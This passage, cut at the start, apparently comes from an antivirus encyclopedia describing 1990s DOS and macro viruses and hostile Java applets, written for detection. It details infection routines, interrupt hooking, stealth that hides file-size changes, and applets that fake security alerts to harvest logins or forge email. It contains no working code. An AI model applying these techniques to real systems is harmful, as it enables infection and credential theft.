Damage: Corrupts the Master Boot Sector and Interrupt Vector Table.
Symptom:
1) Hangs the system during bootup.
2) Increases the file size by 1,710 for .COM files and 1,713 for .EXE
files.
[Trakia.1070]
Virus Type: File Virus
Virus Length: Approximately 1076-1084 bytes
Virus Infect Type: Mutation Virus
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself onto the high memory, allocating 1360 bytes (9FAB:0000).
2) Moves 1357 (054DH) bytes to the high memory.
3) Infects *.COM and *.EXE files. Copies the virus code to the host
program, adding approximately 1076 - 1084 bytes. Loads the virus
first before running the host program.
This virus is a mutation virus. When an infected file is executed, it
will search for *.COM and *.EXE files using Int 21 (4E and 4F), and
will infect when DTA is set. It only infects files within the current
directory.
Damage:
1) Free memory decreases.
2) Increase in file size. Adds approximately 1076-1084 bytes.
Symptom: Delay in program execution due to file search.
Text string: "Files Only (No symbols) .SYM - Load symbol file only.
No extension - Load program & symbols" appears within the virus code.
[Predator.2448]
Virus Status:
Origin:
Eff Length: 2448 bytes
Virus Type: Polymorphic Virus
Symptoms :
Increase of 2448 bytes in sizes of EXE and COM files and decrease
of 6144 bytes in the available memory.
General Comments:
This virus is a variant of the PREDATOR-1072 virus. It will infect
all EXE and COM files that are executed, opened or copied. It is
also memory resident which resides in the High Memory Area.
During the first infection, it decrypts 2424 bytes of its code and then
allocates 6144 bytes in the High Memory Area and transfers its code
there. It also hooks INT 13 and 21.
This message is found in the encrypted virus code:
"Predator Virus #2 (c) 1993 Priest - Phalcon/Skism"
[Freddy.2.1]
Virus Type: File Virus
Other Name:
Virus Length:
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Encrypts data to 11D2:0059h to 937h reading:
"COMMAND.COM *.COM *.EXE Freddy KRueGer 2.1
Hi Fridrik!", thus copying data from 11D2:0059 to 114D:0 to
13FFh, hooking interrupt 21.
2) Infects COMMAND.COM, COM and EXE files.
When the virus is loaded it hangs because it searches for the host
to infect it. Infecting the host, it destroys the file.
[Tremor-1]
Virus Type: File Virus
Virus Length:
Virus Memory Type: High Memory
Place of Origin:
Trigger Condition: Checks if the date is above April 13, or if the
year is above or equal to 1993. If so it executes
the virus code directly.
PC Vectors Hooked: Int 21h, Int 15h, Int 2Fh
Infection Procedure:
1) Loads itself onto the high memory, allocating approximately
4272-4288 bytes.
2) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 4003 bytes. Loads the virus first before
running the host program.
3) While memory resident, the virus infects all opened EXE files.
The virus checks for the system date and time, after the virus code is
decrypted. The code then checks for the DOS version with reason unknown.
It continues by getting the process ID of the program, to enable itself
to set the kind of allocation strategy it wants to do, Int 21 (58).
After this, the virus checks for the extended memory, Int 21 (43). If
all needed requirements are set, it begins to modify the memory
allocation, Int 21 (4A). The virus code is then transferred to the
high memory, at a size approximately 4003 bytes. When in memory, the
virus sets the DTA to which it will copy its code.
Symptom:
Displays: "-=> T.R.E.M.O.R was done by NEUROBASHER
/May-June '92, Germany <=-
-MOMENT-OF-TERROR-IS-THE-BEGINNING-OF-LIFE-"
Infected files run normally. Increase in file size, and occupies
memory space.
Detection method: Decrypt the virus code before detection.
[Troj.1463]
Virus Type:
Virus Length: Approximately 1463 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself onto the high memory after decryption, allocating
3536 bytes (9F23:0100).
2) Moves 1463 (05B7H) bytes to the high memory.
Does not actually infect files, what it does is load itself resident
in the high memory and mess up the execution of files. (see Damage
below)
Damage: When an infected file is executed while the virus is memory
resident, two payloads can be detected.
1. COM files:
When *.COM files are executed while the virus is memory resident,
those files will not run.
2. EXE files:
When *.EXE files are executed while the virus is memory resident,
those files will not run, like COM files. But this will only
happen once. The second execution of an EXE file will result to
a same display, but this time the COMMAND.COM becomes invalid.
System becomes useless afterwards.
Note: Executing a COM file will not suspend itself. But when an EXE
file is executed after a COM file has been executed, the system will
then suspend.
Symptom:
Text string: "Trojector II, (c) Armagedon Utilities, Athens 1992"
appears within the decrypted code.
[Troj.1561]
Virus Type:
Virus Length: Approximately 1561 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself onto the high memory after decryption, allocating
3744 bytes (9F16:0100).
2) Moves 1561 (0619H) bytes to the high memory.
Does not actually infect any files, but the file executed will not run.
Damage: While the virus is memory resident, files executed will not run.
Symptom:
Text string: "Trojector ]I[, (c) Armagedon Utilities, Athe@"
appears within the decrypted code.
[Istanbul-2]
Virus Type: File Virus
Virus Length:
Virus Reinfect Type: doesn't reinfect
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Gets the kernel of the host which is COMMAND.COM.
2) Finds where the carrier of the virus is.
3) Changes the attributes of the carrier.
4) Opens the file.
5) Returns 5h as the file handle.
6) Moves the file pointer, then closes the file handle.
7) Sets the file attributes of the carrier and forces a duplicate
handle which is not successful.
8) Displays the strings: "This file is infected with a virus!
Preinfection file size = 10,000".
[Quicky]
Virus Status:
Origin:
Eff Length: 1376 bytes
Virus Type: Polymorphic Virus
Symptoms :
Increase of 1376 bytes in size of EXE files and decrease of 1760
bytes in the available memory.
General Comments:
Quicky will infect all EXE files that are executed, opened or copied.
Infected files will have an increase of 1376 bytes in their sizes.
It is also Memory Resident which resides in the MCB Chain.
On the first infection, it will decrypt 1275 bytes of its code and then
will allocate 1760 bytes. It will also hook INT 13 and 21. After
doing this, it will run the host program and after executing
it, it will Terminate and Stay Resident in the MCB Chain.
This virus may interfere with some anti-virus programs as it also
contains text string pertaining to some anti-virus overlay files.
This text is found in the virus code:
"Quicky"
[June12]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: EXE and COM files
Trigger Condition: June 12
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h
Infection Procedure:
The virus is a TSR program. After the virus is executed
it immediately loads itself into the memory, where it waits
for an EXE and/or COM files to infect except COMMAND.COM.
It adds approximately 2660 bytes or more.
The infected file, when executed, runs normally.
But a special date, June 12 of any year, displays a message
and plays a tune (i.e., tune of the Philippine National Anthem).
After playing the tune the system resumes normal operation.
When infecting on June 12, the same message will be seen
and same tune can be heard.
Damage: When infecting a file and/or executing an infected file
this message can be seen:
"June 12 - the Independence Day of the Philippines"
The Philippine flag can be seen here with the official color
"MABUHAY ANG PILIPINAS"
"Dedicated to Manong Eddie"
At the same time the Philippine National Anthem can be heard.
The tune can't be stop even pressing Ctrl+Break or Ctrl+C.
Note: The virus makes a smart move by hooking Int 1 and 3 to fool
the one debugging it.
[Junkie.A]
Virus Type: File Virus
Other Name:
Virus Length:
Virus Infect Type: COM files (including COMMAND.COM)
Trigger Condition:
Place of Origin:
PC Vectors Hooked: Int 21h, Int 1Ch
Infection Procedure:
1) Encrypts the data from address 114C:[2CCF] to 114C:[30B6]
by XORing it to D818h, forming a message:
"Dr White - Sweden 1994"
"VS"
"Junkie Virus - Written in Malmo M01D"
2) Hooks interrupt 1Ch and 21h and infects the
master boot record, reading one sector in drive C.
When the infected file is executed, the virus first infects
COMMAN.COM. After rebooting the system, the virus infects
COM files. A virus message can be seen at the end
of the file. Approximately 1030 bytes are added to infected
files.
Note: Diskettes accessed in an infected system will automatically
get infected.
[Burglar.1150]
Virus Name: BURG1150
Virus Type: File Virus
Virus Length: 1,150 bytes
Virus Infect Type: .EXE files
Trigger Condition: 14th minute
Virus Re-infect: No
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 21h, INT 22h,
INT 23h, INT 24h
Infection Procedure:
The virus only infects .EXE files. It adds 1,150 byte to an infected
file. It encrypts the host's SS, SP, IP, and CS registers in its
header and saves it somewhere in the virus program so that it will
be difficult for anti-virus programs to clean them. It copies its
program in the high memory at 9FAA:0000. Then it hooks to interrupt
21H by pointing it to its program in the high memory at 9FAA:0058
to be able to infect loading and executing .EXE programs.
During infection it checks the current time. If it is the 14th minute
of the hour, it dumps the string "Burglar/H" to the textmode screen
(B800:0000) with blinking attribute. There are other text strings
that can be seen inside the viral code which is "AT THE GRAVE OF
GRANDMA". It also hooks to Ctrl C handler INT 23H and points it to
9FAA:016D. Upon pressing Ctrl C, it tries to infect COMMAND.COM in
the current drive. It also hooks to the critical error handler INT
24 in order to hide the file infection whenever there's a virus write
error to the host (if the disk is write protected).
Symptom: Infected files increase by 1,159 bytes.
[Xuxa.1984.C]
Other Name: XUXA1984
Virus Type: File Virus
Virus Length: Approximately 1984 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself onto the high memory, allocating 4016 bytes (using
MEM.EXE).
2) Infects executed *.COM and *.EXE files. It adds 1984 bytes to the
host program but if the virus is memory resident, the file
increase is not seen when the DIR command is used. The virus
subtracts 1984 bytes to the displayed file size.
The virus does not do anything special. It only replicates when a file
is executed while the virus is memory resident. Any file executed
afterwards will be infected.
Damage:
1) Free high memory space decreases by approximately 4016 bytes.
2) Infected files increase by 1984 bytes.
Symptom: Delay in program execution.
[SVC-1-S]
Virus Type: File Virus
Virus Length: Approximately 3103 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Loads itself onto the high memory, allocating 3120 bytes (using MEM).
2) Moves 3104 (0C20H) bytes to the high memory.
3) Infects *.COM and *.EXE files. Copies the virus code to the host
program, adding approximately 3103 bytes. Loads the virus first
before running the host program.
While memory resident, the virus infects any executed *.COM and
*.EXE files. It does not do anything special. It just replicates when
it is memory resident. Only infects executed files.
While the virus is resident in the memory, increase in the size of
infected files will not be visible.
Damage:
1) Free memory decreases by approximately 3120 bytes.
2) Increase in file size. Adds approximately 3103 bytes.
Symptom: Delay in program execution due to virus activity.
Text string: "(c) 1990 by SVC, Vers. 5.0"
appears within the virus code.
Detection method: Check for the above text string.
[Avispa]
Virus Name: AVISPA-D
Virus Type: Polymorphic type
Virus Length: 2051 bytes
Virus Infect Type: .EXE files
Virus Re-infect: No
Virus Memory Type: Memory Resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus infects .EXE files. It infects the host file by attaching its
program at the end of the file. It adds 2051 bytes to the infected file.
Since the virus is polymorphic, its encrypted program is decrypted
using XOR E491H to each byte. You can see after decrypting the data
area of the virus program a string "Virus Avispa-Buenos Aires-Noviembre
1993".
After decryption it allocates 2304 bytes (144 paragraphs) of memory
after the resident part of COMMAND.COM to make itself resident. Then
it hooks to INT 21H by changing its vector to point to its program at
17F8:030A, and infects other loading and executing .EXE programs.
It attempts to open and infect files XCOPY.EXE, MEM.EXE, SETVER.EXE,
and EMM386.EXE in C:\DOS\, if they exist.
Symptom: Increase in .EXE file size by 2051 bytes.
[Byway]
Virus Name: BYWAY-A
Virus Type: Polymorphic type
Virus Length: 3,216 bytes
Virus Infect Type: .COM, .EXE files, MBR
Virus Re-infect: No
Virus Memory Type: Memory resident, MCB type
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus is an encrypting type and can infect both .COM and .EXE files.
It corrupts the Master Boot Sector. It hooks INT 21H such that it cannot
be seen in the interrupt vector table, but hooks to their routines
directly. It infects the host by corrupting the file and sometimes
overwriting its viral code to the host and erasing the host's program.
It allocates its program in the low memory with the DOS resident
programs. Once resident it infects a file when it is loaded, executed
or copied. Most of the time an infected file will not display the change
in its size, time and date attributes once it is infected. Once infected
the files cannot be overwritten by its own or other programs, and cannot
be deleted directly unless the subdirectory where it is located is
deleted. Encrypted trigger dates were seen but the payload is unknown.
The following are the trigger dates:
JAN 4 JUL 16
FEB 6 AUG 18
MAR 8 SEP 20
APR 10 OCT 22
MAY 12 NOV 24
JUN 14 DEC 26
On these dates, the virus will not overwrite the Master Boot Sector
which will render the current drive unbootable. Decrypted text
string can be seen in the viral code:
"<by:Wai-Chan,Aug94,UCV>"
Variant:
Like BYWAY-A, on the trigger dates, the virus will not overwrite the
Master Boot Sector which will render the current drive unbootable.
The decrypted viral code contains the following text strings:
"The-HndV"
"By:W.Chan-N"
Damage: Corrupts the Master Boot Sector.
Symptom: Infected files cannot be overwritten or deleted in the their
current directories.
[Word.Kilo.B]
Virus name: Word.Kilo.B
Alias: None
Platform: Word 6/7
Number of macros: 3
Encrypted: Yes
Size of macros: 3440 Bytes
Place of origin: Malaysia
Date of origin: May 15, 1997
Destructive: No
Trigger date: None
Password: None
Seen In The Wild: No
Seen where:
Word.Kilo-B is another macro virus created in Malaysia. This virus
does not do anything but infect the global template and further
documents.
The virus has two (2) macros when infecting DOC files, and three (3)
macros when infecting the global template. The macro names are:
FileClose
Toolsmacro
FileTemplates
The following information can be found in the macro code:
REM a Virus from NoMercy!!!
REM http://www.geocities.com/researchtriangle/3996
REM any critics, suggestions are welcome!
The macro code seems like it is not encrypted. It only becomes
encrypted after infection.
[JAVA_NoisyBear]
This hostile Java applet displays an image of a bear with a
clock on his stomach (FILE USED: sunbear.jpg). This bear makes
noises and only stops when you close your Internet browser.
[JAVA_Wasteful]
This hostile Java applet clogs your CPU to waste system resources.
[JAVA_Consume]
This hostile Java applet clogs your CPU and eats up your system
memory.
[JAVA_HostileTrd]
This hostile Java applet tries to create threads, which will occupy
specific resources:
WasteResources[I] = new Thread(a);
Such that I = 0 to 999.
As such, resources are eaten up.
The applet ends by prompting: "I'm a friendly applet!"
[JAVA_AtkThread]
This hostile Java applet opens large black windows using the
command:
littleWindow = new AttackFrame("ACK!");
This window gradually increases in size. This process loops
indefinitely. In effect, these black windows will cover the
workspace or the original window.
[JAVA_TripleTrt]
This hostile Java applet opens large black windows. Commands used
are similar with the Java applet AtkThread. In effect, these
black windows will cover the workspace or the original window.
This applet also emits a very distracting noise (FILE USED:
whistle.au).
[JAVA_Ungrateful]
This hostile Java applet displays a fake security error, prompting
the user to re-log into his/her system. Upon logging in, the user
information (i.e., user name and password) is then forwarded to the
hostile applet home, where it will be used to gain access to the
user's system. This therefore exposes the system to the applet's
hostility.
In the end, the applet prompts: "All Applets Are Trustworthy!"
[JAVA_ErrMessage]
Similar to the Ungrateful Java applet in that it displays a fake
security error.
A window appears with these messages:
"Netscape Security Alert:
There is an attempt to violate
your system's security.
To restart Netscape securely,
login to your local system."
The applet then asks the user to re-log into his/her system. Upon
entering the login information (i.e., user name and password), this
information is forwarded to the hostile applet home, where it will
be used to gain access to the user's system. This therefore exposes
the system to the applet's hostility.
It uses the following codes:
sendIt = new Login(myPort);
sendit.communicate(user, psword);
hostility codes follow
[JAVA_SilentTrt]
This hostile Java applet is similar to the AtkThread Java applet in
that it opens large black windows. In effect, these black windows
will cover the workspace or the original window.
[JAVA_Login]
This hostile Java applet retrieves information needed for the user's
system to communicate with the Java applet's home.
[JAVA_LoginSvrSkt]
This hostile Java applet establishes a socket server, which will
receive data from the Java applet Ungrateful.
[JAVA_DoMyWork]
This hostile Java applet prompts the user to do some mathematical
calculations. The results of these calculations are sent to the
applet's home.
The applet does not present any damages, except for the work put
upon the user. In the end, the applet prompts: "I'm Not Doing
Anything!"
[JAVA_Calculator]
This hostile Java applet just calls the applet DoMyWork.
[JAVA_Report]
This hostile Java applet retrieves information needed for the user's
system to communicate with the Java applet's home.
It uses:
public void function communicate(String testtr, String factorstr)
[JAVA_RptSvrSkt]
This hostile Java applet establishes a socket server, which will
receive data from the Java applet DoMyWork.
[JAVA_PenPal]
This hostile Java applet forges the user's electronic mail. It changes
the return address name with: "penpal@" plus mailFrom which is set as
"my.hostile.applet." This mail will be sent to any recipient
classified as toMe. The mail is sent using mailPort 25, which the user
has no control over. A new message will be sent under the public void
function run()using mailMe.
This hostile Java applet is similar to the Java applet Forger.
[JAVA_Forger]
This hostile Java applet forges the user's electronic mail. It changes
the return address name with: "HostileApplets@" plus mailFrom which
is set as "java.sun.com." This mail will be sent to any recipient
classified as toMe. The mail is sent using mailPort 25, which the user
has no control over. A new message will be sent under the public void
function run()using mailMe.
[JAVA_AppKiller]
This hostile Java applet eliminates other loaded Java applets. This
applet also has an error correction feature, which will restore its
own if it was killed by its own code.
[JAVA_ScapeGoat]
This hostile Java applet forces the browser to visit a certain web
site repeatedly. This therefore will open multiple browser windows.
The site is established within the code itself:
Site = new URL("...");
[JAVA_DblTrouble]
This hostile Java applet opens yellow and black windows. It is similar
to the Java applet AtkThread in terms of codes. In effect, these
yellow and black windows will cover the workspace or the original
window.
